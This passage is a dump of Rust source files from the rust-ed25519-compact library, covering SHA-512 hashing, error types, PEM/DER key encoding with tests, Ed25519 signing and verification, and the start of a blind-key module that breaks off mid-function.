0x6a, 0x09, 0xe6, 0x67, 0xf3, 0xbc, 0xc9, 0x08, 0xbb, 0x67, 0xae, 0x85, 0x84, 0xca,
0xa7, 0x3b, 0x3c, 0x6e, 0xf3, 0x72, 0xfe, 0x94, 0xf8, 0x2b, 0xa5, 0x4f, 0xf5, 0x3a,
0x5f, 0x1d, 0x36, 0xf1, 0x51, 0x0e, 0x52, 0x7f, 0xad, 0xe6, 0x82, 0xd1, 0x9b, 0x05,
0x68, 0x8c, 0x2b, 0x3e, 0x6c, 0x1f, 0x1f, 0x83, 0xd9, 0xab, 0xfb, 0x41, 0xbd, 0x6b,
0x5b, 0xe0, 0xcd, 0x19, 0x13, 0x7e, 0x21, 0x79,
];
let mut t = [0u64; 8];
for (i, e) in t.iter_mut().enumerate() {
*e = load_be(&IV, i * 8)
}
State(t)
}
#[cfg_attr(feature = "opt_size", inline(never))]
#[cfg_attr(not(feature = "opt_size"), inline(always))]
fn add(&mut self, x: &State) {
let sx = &mut self.0;
let ex = &x.0;
sx[0] = sx[0].wrapping_add(ex[0]);
sx[1] = sx[1].wrapping_add(ex[1]);
sx[2] = sx[2].wrapping_add(ex[2]);
sx[3] = sx[3].wrapping_add(ex[3]);
sx[4] = sx[4].wrapping_add(ex[4]);
sx[5] = sx[5].wrapping_add(ex[5]);
sx[6] = sx[6].wrapping_add(ex[6]);
sx[7] = sx[7].wrapping_add(ex[7]);
}
fn store(&self, out: &mut [u8]) {
for (i, &e) in self.0.iter().enumerate() {
store_be(out, i * 8, e);
}
}
fn blocks(&mut self, mut input: &[u8]) -> usize {
let mut t = *self;
let mut inlen = input.len();
while inlen >= 128 {
let mut w = W::new(input);
w.G(&mut t, 0);
w.expand();
w.G(&mut t, 1);
w.expand();
w.G(&mut t, 2);
w.expand();
w.G(&mut t, 3);
w.expand();
w.G(&mut t, 4);
t.add(self);
self.0 = t.0;
input = &input[128..];
inlen -= 128;
}
inlen
}
}
#[derive(Copy, Clone)]
pub struct Hash {
state: State,
w: [u8; 128],
r: usize,
len: usize,
}
impl Hash {
pub fn new() -> Hash {
Hash {
state: State::new(),
r: 0,
w: [0u8; 128],
len: 0,
}
}
/// Absorb content
pub fn update<T: AsRef<[u8]>>(&mut self, input: T) {
let input = input.as_ref();
let mut n = input.len();
self.len += n;
let av = 128 - self.r;
let tc = ::core::cmp::min(n, av);
self.w[self.r..self.r + tc].copy_from_slice(&input[0..tc]);
self.r += tc;
n -= tc;
let pos = tc;
if self.r == 128 {
self.state.blocks(&self.w);
self.r = 0;
}
if self.r == 0 && n > 0 {
let rb = self.state.blocks(&input[pos..]);
if rb > 0 {
self.w[..rb].copy_from_slice(&input[pos + n - rb..]);
self.r = rb;
}
}
}
/// Compute SHA512(absorbed content)
pub fn finalize(mut self) -> [u8; 64] {
let mut padded = [0u8; 256];
padded[..self.r].copy_from_slice(&self.w[..self.r]);
padded[self.r] = 0x80;
let r = if self.r < 112 { 128 } else { 256 };
let bits = self.len * 8;
for i in 0..8 {
padded[r - 8 + i] = (bits as u64 >> (56 - i * 8)) as u8;
}
self.state.blocks(&padded[..r]);
let mut out = [0u8; 64];
self.state.store(&mut out);
out
}
/// Compute SHA512(`input`)
pub fn hash<T: AsRef<[u8]>>(input: T) -> [u8; 64] {
let mut h = Hash::new();
h.update(input);
h.finalize()
}
}
impl Default for Hash {
fn default() -> Self {
Self::new()
}
}
| rust | MIT | 661a45223bece49b3ad8da33fe0f3a408ea895c1 | 2026-01-04T20:21:43.974864Z | false |
jedisct1/rust-ed25519-compact | https://github.com/jedisct1/rust-ed25519-compact/blob/661a45223bece49b3ad8da33fe0f3a408ea895c1/src/error.rs | src/error.rs | use core::fmt::{self, Display};
#[derive(Debug, Copy, Clone, Eq, PartialEq)]
pub enum Error {
/// The signature doesn't verify.
SignatureMismatch,
/// A weak public key was used.
WeakPublicKey,
/// The public key is invalid.
InvalidPublicKey,
/// The secret key is invalid.
InvalidSecretKey,
/// The signature is invalid.
InvalidSignature,
/// The seed doesn't have the expected length.
InvalidSeed,
/// The blind doesn't have the expected length.
InvalidBlind,
/// The noise doesn't have the expected length.
InvalidNoise,
/// Parse error
ParseError,
/// Non-canonical encoding
NonCanonical,
}
#[cfg(feature = "std")]
impl std::error::Error for Error {}
impl Display for Error {
fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
match self {
Error::SignatureMismatch => write!(f, "Signature doesn't verify"),
Error::WeakPublicKey => write!(f, "Weak public key"),
Error::InvalidPublicKey => write!(f, "Invalid public key"),
Error::InvalidSecretKey => write!(f, "Invalid secret key"),
Error::InvalidSignature => write!(f, "Invalid signature"),
Error::InvalidSeed => write!(f, "Invalid seed length"),
Error::InvalidBlind => write!(f, "Invalid blind length"),
Error::InvalidNoise => write!(f, "Invalid noise length"),
Error::ParseError => write!(f, "Parse error"),
Error::NonCanonical => write!(f, "Non-canonical encoding"),
}
}
}
| rust | MIT | 661a45223bece49b3ad8da33fe0f3a408ea895c1 | 2026-01-04T20:21:43.974864Z | false |
jedisct1/rust-ed25519-compact | https://github.com/jedisct1/rust-ed25519-compact/blob/661a45223bece49b3ad8da33fe0f3a408ea895c1/src/pem.rs | src/pem.rs | #[cfg(feature = "std")]
use ct_codecs::Encoder;
use ct_codecs::{Base64, Decoder};
use super::{Error, KeyPair, PublicKey, SecretKey, Seed};
const DER_HEADER_SK: [u8; 16] = [48, 46, 2, 1, 0, 48, 5, 6, 3, 43, 101, 112, 4, 34, 4, 32];
const DER_HEADER_PK: [u8; 12] = [48, 42, 48, 5, 6, 3, 43, 101, 112, 3, 33, 0];
impl KeyPair {
/// Import a key pair from an OpenSSL-compatible DER file.
pub fn from_der(der: &[u8]) -> Result<Self, Error> {
if der.len() != DER_HEADER_SK.len() + Seed::BYTES || der[0..16] != DER_HEADER_SK {
return Err(Error::ParseError);
}
let mut seed = [0u8; Seed::BYTES];
seed.copy_from_slice(&der[16..]);
let kp = KeyPair::from_seed(Seed::new(seed));
Ok(kp)
}
/// Import a key pair from an OpenSSL-compatible PEM file.
pub fn from_pem(pem: &str) -> Result<Self, Error> {
let mut it = pem.split("-----BEGIN PRIVATE KEY-----");
let _ = it.next().ok_or(Error::ParseError)?;
let inner = it.next().ok_or(Error::ParseError)?;
let mut it = inner.split("-----END PRIVATE KEY-----");
let b64 = it.next().ok_or(Error::ParseError)?;
let _ = it.next().ok_or(Error::ParseError)?;
let mut der = [0u8; 16 + Seed::BYTES];
Base64::decode(&mut der, b64, Some(b"\r\n\t ")).map_err(|_| Error::ParseError)?;
Self::from_der(&der)
}
/// Export a key pair as an OpenSSL-compatible PEM file.
#[cfg(feature = "std")]
pub fn to_pem(&self) -> String {
format!("{}\n{}\n", self.sk.to_pem().trim(), self.pk.to_pem().trim())
}
}
impl SecretKey {
/// Import a secret key from an OpenSSL-compatible DER file.
pub fn from_der(der: &[u8]) -> Result<Self, Error> {
let kp = KeyPair::from_der(der)?;
Ok(kp.sk)
}
/// Import a secret key from an OpenSSL-compatible PEM file.
pub fn from_pem(pem: &str) -> Result<Self, Error> {
let kp = KeyPair::from_pem(pem)?;
Ok(kp.sk)
}
/// Export a secret key as an OpenSSL-compatible DER file.
#[cfg(feature = "std")]
pub fn to_der(&self) -> Vec<u8> {
let mut der = [0u8; 16 + Seed::BYTES];
der[0..16].copy_from_slice(&DER_HEADER_SK);
der[16..].copy_from_slice(self.seed().as_ref());
der.to_vec()
}
/// Export a secret key as an OpenSSL-compatible PEM file.
#[cfg(feature = "std")]
pub fn to_pem(&self) -> String {
let b64 = Base64::encode_to_string(self.to_der()).unwrap();
format!(
"-----BEGIN PRIVATE KEY-----\n{}\n-----END PRIVATE KEY-----\n",
b64
)
}
}
impl PublicKey {
/// Import a public key from an OpenSSL-compatible DER file.
pub fn from_der(der: &[u8]) -> Result<Self, Error> {
if der.len() != DER_HEADER_PK.len() + PublicKey::BYTES || der[0..12] != DER_HEADER_PK {
return Err(Error::ParseError);
}
let mut pk = [0u8; PublicKey::BYTES];
pk.copy_from_slice(&der[12..]);
let pk = PublicKey::new(pk);
Ok(pk)
}
/// Import a public key from an OpenSSL-compatible PEM file.
pub fn from_pem(pem: &str) -> Result<Self, Error> {
let mut it = pem.split("-----BEGIN PUBLIC KEY-----");
let _ = it.next().ok_or(Error::ParseError)?;
let inner = it.next().ok_or(Error::ParseError)?;
let mut it = inner.split("-----END PUBLIC KEY-----");
let b64 = it.next().ok_or(Error::ParseError)?;
let _ = it.next().ok_or(Error::ParseError)?;
let mut der = [0u8; 12 + PublicKey::BYTES];
Base64::decode(&mut der, b64, Some(b"\r\n\t ")).map_err(|_| Error::ParseError)?;
Self::from_der(&der)
}
/// Export a public key as an OpenSSL-compatible DER file.
#[cfg(feature = "std")]
pub fn to_der(&self) -> Vec<u8> {
let mut der = [0u8; 12 + PublicKey::BYTES];
der[0..12].copy_from_slice(&DER_HEADER_PK);
der[12..].copy_from_slice(self.as_ref());
der.to_vec()
}
/// Export a public key as an OpenSSL-compatible PEM file.
#[cfg(feature = "std")]
pub fn to_pem(&self) -> String {
let b64 = Base64::encode_to_string(self.to_der()).unwrap();
format!(
"-----BEGIN PUBLIC KEY-----\n{}\n-----END PUBLIC KEY-----\n",
b64
)
}
}
#[test]
fn test_pem() {
let sk_pem = "-----BEGIN PRIVATE KEY-----
MC4CAQAwBQYDK2VwBCIEIMXY1NUbUe/3dW2YUoKW5evsnCJPMfj60/q0RzGne3gg
-----END PRIVATE KEY-----\n";
let sk = SecretKey::from_pem(sk_pem).unwrap();
let pk_pem = "-----BEGIN PUBLIC KEY-----
MCowBQYDK2VwAyEAyrRjJfTnhMcW5igzYvPirFW5eUgMdKeClGzQhd4qw+Y=
-----END PUBLIC KEY-----\n";
let pk = PublicKey::from_pem(pk_pem).unwrap();
assert_eq!(sk.public_key(), pk);
#[cfg(feature = "std")]
{
let sk_pem2 = sk.to_pem();
let pk_pem2 = pk.to_pem();
assert_eq!(sk_pem, sk_pem2);
assert_eq!(pk_pem, pk_pem2);
}
}
#[test]
fn test_der() {
let kp = KeyPair::generate();
let sk_der = kp.sk.to_der();
let sk2 = SecretKey::from_der(&sk_der).unwrap();
let pk_der = kp.pk.to_der();
let pk2 = PublicKey::from_der(&pk_der).unwrap();
assert_eq!(kp.sk, sk2);
assert_eq!(kp.pk, pk2);
}
| rust | MIT | 661a45223bece49b3ad8da33fe0f3a408ea895c1 | 2026-01-04T20:21:43.974864Z | false |
jedisct1/rust-ed25519-compact | https://github.com/jedisct1/rust-ed25519-compact/blob/661a45223bece49b3ad8da33fe0f3a408ea895c1/src/ed25519.rs | src/ed25519.rs | use core::convert::TryFrom;
use core::fmt;
use core::ops::{Deref, DerefMut};
use super::common::*;
#[cfg(feature = "blind-keys")]
use super::edwards25519::{ge_scalarmult, sc_invert, sc_mul};
use super::edwards25519::{
ge_scalarmult_base, is_identity, sc_muladd, sc_reduce, sc_reduce32, sc_reject_noncanonical,
GeP2, GeP3,
};
use super::error::Error;
use super::sha512;
/// A public key.
#[derive(Copy, Clone, Debug, Eq, PartialEq, Hash)]
pub struct PublicKey([u8; PublicKey::BYTES]);
impl PublicKey {
/// Number of raw bytes in a public key.
pub const BYTES: usize = 32;
/// Creates a public key from raw bytes.
pub fn new(pk: [u8; PublicKey::BYTES]) -> Self {
PublicKey(pk)
}
/// Creates a public key from a slice.
pub fn from_slice(pk: &[u8]) -> Result<Self, Error> {
let mut pk_ = [0u8; PublicKey::BYTES];
if pk.len() != pk_.len() {
return Err(Error::InvalidPublicKey);
}
pk_.copy_from_slice(pk);
Ok(PublicKey::new(pk_))
}
}
impl Deref for PublicKey {
type Target = [u8; PublicKey::BYTES];
/// Returns a public key as bytes.
fn deref(&self) -> &Self::Target {
&self.0
}
}
impl DerefMut for PublicKey {
/// Returns a public key as mutable bytes.
fn deref_mut(&mut self) -> &mut Self::Target {
&mut self.0
}
}
/// A secret key.
#[derive(Clone, Debug, Eq, PartialEq, Hash)]
pub struct SecretKey([u8; SecretKey::BYTES]);
impl SecretKey {
/// Number of bytes in a secret key.
pub const BYTES: usize = 32 + PublicKey::BYTES;
/// Creates a secret key from raw bytes.
pub fn new(sk: [u8; SecretKey::BYTES]) -> Self {
SecretKey(sk)
}
/// Creates a secret key from a slice.
pub fn from_slice(sk: &[u8]) -> Result<Self, Error> {
let mut sk_ = [0u8; SecretKey::BYTES];
if sk.len() != sk_.len() {
return Err(Error::InvalidSecretKey);
}
sk_.copy_from_slice(sk);
Ok(SecretKey::new(sk_))
}
/// Returns the public counterpart of a secret key.
pub fn public_key(&self) -> PublicKey {
let mut pk = [0u8; PublicKey::BYTES];
pk.copy_from_slice(&self[Seed::BYTES..]);
PublicKey(pk)
}
/// Returns the seed of a secret key.
pub fn seed(&self) -> Seed {
Seed::from_slice(&self[0..Seed::BYTES]).unwrap()
}
/// Returns `Ok(())` if the given public key is the public counterpart of
/// this secret key.
/// Returns `Err(Error::InvalidPublicKey)` otherwise.
/// The public key is recomputed (not just copied) from the secret key,
/// so this will detect corruption of the secret key.
pub fn validate_public_key(&self, pk: &PublicKey) -> Result<(), Error> {
let kp = KeyPair::from_seed(self.seed());
if kp.pk != *pk {
return Err(Error::InvalidPublicKey);
}
Ok(())
}
}
impl Drop for SecretKey {
fn drop(&mut self) {
Mem::wipe(&mut self.0)
}
}
impl Deref for SecretKey {
type Target = [u8; SecretKey::BYTES];
/// Returns a secret key as bytes.
fn deref(&self) -> &Self::Target {
&self.0
}
}
impl DerefMut for SecretKey {
/// Returns a secret key as mutable bytes.
fn deref_mut(&mut self) -> &mut Self::Target {
&mut self.0
}
}
/// A key pair.
#[derive(Clone, Debug, Eq, PartialEq, Hash)]
pub struct KeyPair {
/// Public key part of the key pair.
pub pk: PublicKey,
/// Secret key part of the key pair.
pub sk: SecretKey,
}
/// An Ed25519 signature.
#[derive(Copy, Clone, Eq, PartialEq, Hash)]
pub struct Signature([u8; Signature::BYTES]);
impl fmt::Debug for Signature {
fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
f.write_fmt(format_args!("{:x?}", &self.0))
}
}
impl TryFrom<&[u8]> for Signature {
type Error = Error;
fn try_from(slice: &[u8]) -> Result<Self, Self::Error> {
Signature::from_slice(slice)
}
}
impl AsRef<[u8]> for Signature {
fn as_ref(&self) -> &[u8] {
&self.0
}
}
impl Signature {
/// Number of raw bytes in a signature.
pub const BYTES: usize = 64;
/// Creates a signature from raw bytes.
pub fn new(bytes: [u8; Signature::BYTES]) -> Self {
Signature(bytes)
}
/// Creates a signature key from a slice.
pub fn from_slice(signature: &[u8]) -> Result<Self, Error> {
let mut signature_ = [0u8; Signature::BYTES];
if signature.len() != signature_.len() {
return Err(Error::InvalidSignature);
}
signature_.copy_from_slice(signature);
Ok(Signature::new(signature_))
}
}
impl Deref for Signature {
type Target = [u8; Signature::BYTES];
/// Returns a signture as bytes.
fn deref(&self) -> &Self::Target {
&self.0
}
}
impl DerefMut for Signature {
/// Returns a signature as mutable bytes.
fn deref_mut(&mut self) -> &mut Self::Target {
&mut self.0
}
}
/// The state of a streaming verification operation.
#[derive(Clone)]
pub struct VerifyingState {
hasher: sha512::Hash,
signature: Signature,
a: GeP3,
}
impl Drop for VerifyingState {
fn drop(&mut self) {
Mem::wipe(&mut self.signature.0);
}
}
impl VerifyingState {
fn new(pk: &PublicKey, signature: &Signature) -> Result<Self, Error> {
let r = &signature[0..32];
let s = &signature[32..64];
sc_reject_noncanonical(s)?;
if is_identity(pk) || pk.iter().fold(0, |acc, x| acc | x) == 0 {
return Err(Error::WeakPublicKey);
}
let a = match GeP3::from_bytes_negate_vartime(pk) {
Some(g) => g,
None => {
return Err(Error::InvalidPublicKey);
}
};
let mut hasher = sha512::Hash::new();
hasher.update(r);
hasher.update(&pk[..]);
Ok(VerifyingState {
hasher,
signature: *signature,
a,
})
}
/// Appends data to the message being verified.
pub fn absorb(&mut self, chunk: impl AsRef<[u8]>) {
self.hasher.update(chunk)
}
/// Verifies the signature and return it.
pub fn verify(&self) -> Result<(), Error> {
let mut expected_r_bytes = [0u8; 32];
expected_r_bytes.copy_from_slice(&self.signature[0..32]);
let expected_r =
GeP3::from_bytes_vartime(&expected_r_bytes).ok_or(Error::InvalidSignature)?;
let s = &self.signature[32..64];
let mut hash = self.hasher.finalize();
sc_reduce(&mut hash);
let r = GeP2::double_scalarmult_vartime(hash.as_ref(), self.a, s);
if (expected_r - GeP3::from(r)).has_small_order() {
Ok(())
} else {
Err(Error::SignatureMismatch)
}
}
}
impl PublicKey {
/// Verify the signature of a multi-part message (streaming).
pub fn verify_incremental(&self, signature: &Signature) -> Result<VerifyingState, Error> {
VerifyingState::new(self, signature)
}
/// Verifies that the signature `signature` is valid for the message
/// `message`.
pub fn verify(&self, message: impl AsRef<[u8]>, signature: &Signature) -> Result<(), Error> {
let mut st = VerifyingState::new(self, signature)?;
st.absorb(message);
st.verify()
}
}
/// The state of a streaming signature operation.
#[derive(Clone)]
pub struct SigningState {
hasher: sha512::Hash,
az: [u8; 64],
nonce: [u8; 64],
}
impl Drop for SigningState {
fn drop(&mut self) {
Mem::wipe(&mut self.az);
Mem::wipe(&mut self.nonce);
}
}
impl SigningState {
fn new(nonce: [u8; 64], az: [u8; 64], pk_: &[u8]) -> Self {
let mut prefix: [u8; 64] = [0; 64];
let r = ge_scalarmult_base(&nonce[0..32]);
prefix[0..32].copy_from_slice(&r.to_bytes()[..]);
prefix[32..64].copy_from_slice(pk_);
let mut st = sha512::Hash::new();
st.update(prefix);
SigningState {
hasher: st,
nonce,
az,
}
}
/// Appends data to the message being signed.
pub fn absorb(&mut self, chunk: impl AsRef<[u8]>) {
self.hasher.update(chunk)
}
/// Computes the signature and return it.
pub fn sign(&self) -> Signature {
let mut signature: [u8; 64] = [0; 64];
let r = ge_scalarmult_base(&self.nonce[0..32]);
signature[0..32].copy_from_slice(&r.to_bytes()[..]);
let mut hram = self.hasher.finalize();
sc_reduce(&mut hram);
sc_muladd(
&mut signature[32..64],
&hram[0..32],
&self.az[0..32],
&self.nonce[0..32],
);
Signature(signature)
}
}
impl SecretKey {
/// Sign a multi-part message (streaming API).
/// It is critical for `noise` to never repeat.
pub fn sign_incremental(&self, noise: Noise) -> SigningState {
let seed = &self[0..32];
let pk = &self[32..64];
let az: [u8; 64] = {
let mut hash_output = sha512::Hash::hash(seed);
hash_output[0] &= 248;
hash_output[31] &= 63;
hash_output[31] |= 64;
hash_output
};
let mut st = sha512::Hash::new();
#[cfg(feature = "random")]
{
let additional_noise = Noise::generate();
st.update(additional_noise.as_ref());
}
st.update(noise.as_ref());
st.update(seed);
let nonce = st.finalize();
SigningState::new(nonce, az, pk)
}
/// Computes a signature for the message `message` using the secret key.
/// The noise parameter is optional, but recommended in order to mitigate
/// fault attacks.
pub fn sign(&self, message: impl AsRef<[u8]>, noise: Option<Noise>) -> Signature {
let seed = &self[0..32];
let pk = &self[32..64];
let az: [u8; 64] = {
let mut hash_output = sha512::Hash::hash(seed);
hash_output[0] &= 248;
hash_output[31] &= 63;
hash_output[31] |= 64;
hash_output
};
let nonce = {
let mut hasher = sha512::Hash::new();
if let Some(noise) = noise {
hasher.update(&noise[..]);
hasher.update(&az[..]);
} else {
hasher.update(&az[32..64]);
}
hasher.update(&message);
let mut hash_output = hasher.finalize();
sc_reduce(&mut hash_output[0..64]);
hash_output
};
let mut st = SigningState::new(nonce, az, pk);
st.absorb(&message);
let signature = st.sign();
#[cfg(feature = "self-verify")]
{
PublicKey::from_slice(pk)
.expect("Key length changed")
.verify(message, &signature)
.expect("Newly created signature cannot be verified");
}
signature
}
}
impl KeyPair {
/// Number of bytes in a key pair.
pub const BYTES: usize = SecretKey::BYTES;
/// Generates a new key pair.
#[cfg(feature = "random")]
pub fn generate() -> KeyPair {
KeyPair::from_seed(Seed::default())
}
/// Generates a new key pair using a secret seed.
pub fn from_seed(seed: Seed) -> KeyPair {
if seed.iter().fold(0, |acc, x| acc | x) == 0 {
panic!("All-zero seed");
}
let (scalar, _) = {
let hash_output = sha512::Hash::hash(&seed[..]);
KeyPair::split(&hash_output, false, true)
};
let pk = ge_scalarmult_base(&scalar).to_bytes();
let mut sk = [0u8; 64];
sk[0..32].copy_from_slice(&*seed);
sk[32..64].copy_from_slice(&pk);
KeyPair {
pk: PublicKey(pk),
sk: SecretKey(sk),
}
}
/// Creates a key pair from a slice.
pub fn from_slice(bytes: &[u8]) -> Result<Self, Error> {
let sk = SecretKey::from_slice(bytes)?;
let pk = sk.public_key();
Ok(KeyPair { pk, sk })
}
/// Clamp a scalar.
pub fn clamp(scalar: &mut [u8]) {
scalar[0] &= 248;
scalar[31] &= 63;
scalar[31] |= 64;
}
/// Split a serialized representation of a key pair into a secret scalar and
/// a prefix.
pub fn split(bytes: &[u8; 64], reduce: bool, clamp: bool) -> ([u8; 32], [u8; 32]) {
let mut scalar = [0u8; 32];
scalar.copy_from_slice(&bytes[0..32]);
if clamp {
Self::clamp(&mut scalar);
}
if reduce {
sc_reduce32(&mut scalar);
}
let mut prefix = [0u8; 32];
prefix.copy_from_slice(&bytes[32..64]);
(scalar, prefix)
}
/// Check that the public key is valid for the secret key.
pub fn validate(&self) -> Result<(), Error> {
self.sk.validate_public_key(&self.pk)
}
}
impl Deref for KeyPair {
type Target = [u8; KeyPair::BYTES];
/// Returns a key pair as bytes.
fn deref(&self) -> &Self::Target {
&self.sk
}
}
impl DerefMut for KeyPair {
/// Returns a key pair as mutable bytes.
fn deref_mut(&mut self) -> &mut Self::Target {
&mut self.sk
}
}
/// Noise, for non-deterministic signatures.
#[derive(Copy, Clone, Debug, Eq, PartialEq, Hash)]
pub struct Noise([u8; Noise::BYTES]);
impl Noise {
/// Number of raw bytes for a noise component.
pub const BYTES: usize = 16;
/// Creates a new noise component from raw bytes.
pub fn new(noise: [u8; Noise::BYTES]) -> Self {
Noise(noise)
}
/// Creates noise from a slice.
pub fn from_slice(noise: &[u8]) -> Result<Self, Error> {
let mut noise_ = [0u8; Noise::BYTES];
if noise.len() != noise_.len() {
return Err(Error::InvalidNoise);
}
noise_.copy_from_slice(noise);
Ok(Noise::new(noise_))
}
}
impl Deref for Noise {
type Target = [u8; Noise::BYTES];
/// Returns the noise as bytes.
fn deref(&self) -> &Self::Target {
&self.0
}
}
impl DerefMut for Noise {
/// Returns the noise as mutable bytes.
fn deref_mut(&mut self) -> &mut Self::Target {
&mut self.0
}
}
#[cfg(feature = "random")]
impl Default for Noise {
/// Generates random noise.
fn default() -> Self {
let mut noise = [0u8; Noise::BYTES];
getrandom::fill(&mut noise).expect("RNG failure");
Noise(noise)
}
}
#[cfg(feature = "random")]
impl Noise {
/// Generates random noise.
pub fn generate() -> Self {
Noise::default()
}
}
#[cfg(feature = "traits")]
mod ed25519_trait {
use ::ed25519::signature as ed25519_trait;
use super::{PublicKey, SecretKey, Signature};
impl ed25519_trait::SignatureEncoding for Signature {
type Repr = Signature;
}
impl ed25519_trait::Signer<Signature> for SecretKey {
fn try_sign(&self, message: &[u8]) -> Result<Signature, ed25519_trait::Error> {
Ok(self.sign(message, None))
}
}
impl ed25519_trait::Verifier<Signature> for PublicKey {
fn verify(
&self,
message: &[u8],
signature: &Signature,
) -> Result<(), ed25519_trait::Error> {
#[cfg(feature = "std")]
{
self.verify(message, signature)
.map_err(ed25519_trait::Error::from_source)
}
#[cfg(not(feature = "std"))]
{
self.verify(message, signature)
.map_err(|_| ed25519_trait::Error::new())
}
}
}
}
#[test]
fn test_ed25519() {
let kp = KeyPair::from_seed([42u8; 32].into());
let message = b"Hello, World!";
let signature = kp.sk.sign(message, None);
assert!(kp.pk.verify(message, &signature).is_ok());
assert!(kp.pk.verify(b"Hello, world!", &signature).is_err());
assert_eq!(
signature.as_ref(),
[
196, 182, 1, 15, 182, 182, 231, 166, 227, 62, 243, 85, 49, 174, 169, 9, 162, 196, 98,
104, 30, 81, 22, 38, 184, 136, 253, 128, 10, 160, 128, 105, 127, 130, 138, 164, 57, 86,
94, 160, 216, 85, 153, 139, 81, 100, 38, 124, 235, 210, 26, 95, 231, 90, 73, 206, 33,
216, 171, 15, 188, 181, 136, 7,
]
);
}
#[cfg(feature = "blind-keys")]
mod blind_keys {
    use super::*;

    /// A secret blinding factor (32 bytes) used to derive blind keys.
    #[derive(Clone, Debug, Eq, PartialEq, Hash)]
    pub struct Blind([u8; Blind::BYTES]);

    impl From<[u8; 32]> for Blind {
        fn from(blind: [u8; 32]) -> Self {
            Blind(blind)
        }
    }

    impl Blind {
        /// Number of raw bytes in a blind.
        pub const BYTES: usize = 32;

        /// Creates a blind from raw bytes.
        pub fn new(blind: [u8; Blind::BYTES]) -> Self {
            Blind(blind)
        }

        /// Creates a blind from a slice.
        pub fn from_slice(blind: &[u8]) -> Result<Self, Error> {
            let mut blind_ = [0u8; Blind::BYTES];
            if blind.len() != blind_.len() {
                return Err(Error::InvalidBlind);
            }
            blind_.copy_from_slice(blind);
            Ok(Blind::new(blind_))
        }
    }

    impl Drop for Blind {
        // Best-effort zeroization of the secret blinding factor on drop.
        fn drop(&mut self) {
            Mem::wipe(&mut self.0)
        }
    }

    #[cfg(feature = "random")]
    impl Default for Blind {
        /// Generates a random blind.
        fn default() -> Self {
            let mut blind = [0u8; Blind::BYTES];
            getrandom::fill(&mut blind).expect("RNG failure");
            Blind(blind)
        }
    }

    #[cfg(feature = "random")]
    impl Blind {
        /// Generates a random blind.
        pub fn generate() -> Self {
            Blind::default()
        }
    }

    impl Deref for Blind {
        type Target = [u8; Blind::BYTES];

        /// Returns a blind as bytes.
        fn deref(&self) -> &Self::Target {
            &self.0
        }
    }

    impl DerefMut for Blind {
        /// Returns a blind as mutable bytes.
        fn deref_mut(&mut self) -> &mut Self::Target {
            &mut self.0
        }
    }

    /// A blind public key.
    #[derive(Copy, Clone, Debug, Eq, PartialEq, Hash)]
    pub struct BlindPublicKey([u8; PublicKey::BYTES]);

    impl Deref for BlindPublicKey {
        type Target = [u8; BlindPublicKey::BYTES];

        /// Returns a public key as bytes.
        fn deref(&self) -> &Self::Target {
            &self.0
        }
    }

    impl DerefMut for BlindPublicKey {
        /// Returns a public key as mutable bytes.
        fn deref_mut(&mut self) -> &mut Self::Target {
            &mut self.0
        }
    }

    impl BlindPublicKey {
        /// Number of bytes in a blind public key.
        pub const BYTES: usize = PublicKey::BYTES;

        /// Creates a blind public key from raw bytes.
        pub fn new(bpk: [u8; PublicKey::BYTES]) -> Self {
            BlindPublicKey(bpk)
        }

        /// Creates a blind public key from a slice.
        pub fn from_slice(bpk: &[u8]) -> Result<Self, Error> {
            let mut bpk_ = [0u8; PublicKey::BYTES];
            if bpk.len() != bpk_.len() {
                return Err(Error::InvalidPublicKey);
            }
            bpk_.copy_from_slice(bpk);
            Ok(BlindPublicKey::new(bpk_))
        }

        /// Unblinds a public key.
        pub fn unblind(&self, blind: &Blind, ctx: impl AsRef<[u8]>) -> Result<PublicKey, Error> {
            let pk_p3 = GeP3::from_bytes_vartime(&self.0).ok_or(Error::InvalidPublicKey)?;
            // Recompute the blinding scalar from SHA-512(blind || 0x00 || ctx),
            // exactly as in `KeyPair::blind()` / `PublicKey::blind()` below,
            // then undo the blinding by multiplying by its inverse mod the
            // group order.
            let mut hx = sha512::Hash::new();
            hx.update(&blind[..]);
            hx.update([0u8]);
            hx.update(ctx.as_ref());
            let hash_output = hx.finalize();
            let (blind_factor, _) = KeyPair::split(&hash_output, true, false);
            let inverse = sc_invert(&blind_factor);
            Ok(PublicKey(ge_scalarmult(&inverse, &pk_p3).to_bytes()))
        }

        /// Verifies that the signature `signature` is valid for the message
        /// `message`.
        pub fn verify(
            &self,
            message: impl AsRef<[u8]>,
            signature: &Signature,
        ) -> Result<(), Error> {
            PublicKey::new(self.0).verify(message, signature)
        }
    }

    impl From<PublicKey> for BlindPublicKey {
        fn from(pk: PublicKey) -> Self {
            BlindPublicKey(pk.0)
        }
    }

    impl From<BlindPublicKey> for PublicKey {
        fn from(bpk: BlindPublicKey) -> Self {
            PublicKey(bpk.0)
        }
    }

    /// A blind secret key.
    #[derive(Clone, Debug, Eq, PartialEq, Hash)]
    pub struct BlindSecretKey {
        // Nonce prefix (prefix1 || prefix2) mixed into the hash when signing.
        pub prefix: [u8; 2 * Seed::BYTES],
        // The secret scalar multiplied by the blinding factor (mod L).
        pub blind_scalar: [u8; 32],
        // Public key matching `blind_scalar`.
        pub blind_pk: BlindPublicKey,
    }

    /// A blind key pair.
    #[derive(Clone, Debug, Eq, PartialEq, Hash)]
    pub struct BlindKeyPair {
        /// Public key part of the blind key pair.
        pub blind_pk: BlindPublicKey,
        /// Secret key part of the blind key pair.
        pub blind_sk: BlindSecretKey,
    }

    impl BlindSecretKey {
        /// Computes a signature for the message `message` using the blind
        /// secret key. The noise parameter is optional, but recommended
        /// in order to mitigate fault attacks.
        pub fn sign(&self, message: impl AsRef<[u8]>, noise: Option<Noise>) -> Signature {
            // Deterministic nonce: SHA-512([noise ||] prefix || message),
            // reduced modulo the group order.
            let nonce = {
                let mut hasher = sha512::Hash::new();
                if let Some(noise) = noise {
                    hasher.update(&noise[..]);
                    hasher.update(self.prefix);
                } else {
                    hasher.update(self.prefix);
                }
                hasher.update(&message);
                let mut hash_output = hasher.finalize();
                sc_reduce(&mut hash_output[0..64]);
                hash_output
            };
            let mut signature: [u8; 64] = [0; 64];
            // R = nonce * B.
            let r = ge_scalarmult_base(&nonce[0..32]);
            signature[0..32].copy_from_slice(&r.to_bytes()[..]);
            // Temporarily place the public key in the second half so the
            // challenge hash is computed over R || A || M.
            signature[32..64].copy_from_slice(&self.blind_pk.0);
            let mut hasher = sha512::Hash::new();
            hasher.update(signature.as_ref());
            hasher.update(&message);
            let mut hram = hasher.finalize();
